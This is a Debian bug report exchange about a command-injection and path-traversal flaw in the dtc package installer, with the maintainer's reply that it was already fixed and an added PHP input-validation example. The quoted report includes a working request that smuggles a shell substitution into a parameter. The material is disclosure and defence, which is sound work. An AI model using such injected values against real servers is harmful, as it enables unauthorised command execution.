On 08/13/2011 05:00 PM, Ansgar Burchardt wrote:
> Package: src:dtc
> Version: 0.32.10-2
> Severity: critical
> Tags: security upstream
>
> The package installer helpfully allows users to run shell code:
>
> wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'
>
> Ansgar
I'm surprised to see both #637630 and #637632, because they've been fixed a long time ago (the same file in the git has the necessary input checking).

Thomas
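As an added illustration of the kind of input checking the reply refers to (example code, not the dtc package's own, and assuming its web front end is written in PHP): a request parameter such as `dtcpkg_directory` or `pkg` must be restricted to a single safe path component before it is joined into a path or handed to a shell, and every shell argument must be quoted regardless. The function and command names below are hypothetical.

```php
<?php
// Added example, not code from the dtc package.
// Rejects the two ingredients of the report: '../' traversal in pkg and
// shell substitution like '$(touch /tmp/more-owned)' in dtcpkg_directory.

function validate_pkg_path(string $value): ?string {
    // Allow exactly one relative path component: it must start with a letter
    // or digit and may contain only letters, digits, '.', '_' and '-'.
    // Slashes, '$', '(', ')', spaces and leading dots all fail this test,
    // so both '../../tmp' and '$(touch /tmp/x)/tmp/foo' are refused.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/', $value)) {
        return null;
    }
    return $value;
}

function build_install_command(string $base_dir, string $pkg, string $dir): ?string {
    $pkg = validate_pkg_path($pkg);
    $dir = validate_pkg_path($dir);
    if ($pkg === null || $dir === null) {
        // Refuse the request outright rather than "cleaning" the value.
        return null;
    }
    // Quote each argument even after validation so the shell sees it as data.
    // 'install-pkg' is a placeholder for whatever helper the panel invokes.
    return 'install-pkg ' . escapeshellarg($base_dir . '/' . $pkg)
         . ' ' . escapeshellarg($base_dir . '/' . $dir);
}

// Constructed inputs: the values from the bug report, then a benign pair.
$rejected = build_install_command('/var/lib/dtc', '../../../../../../../../../tmp',
                                  '$(touch /tmp/more-owned)/tmp/foo');
$accepted = build_install_command('/var/lib/dtc', 'mypkg-1.0', 'www');
if ($rejected === null) {
    echo "hostile request rejected before any command was built\n";
}
if ($accepted !== null) {
    echo "would run: $accepted\n";
}
```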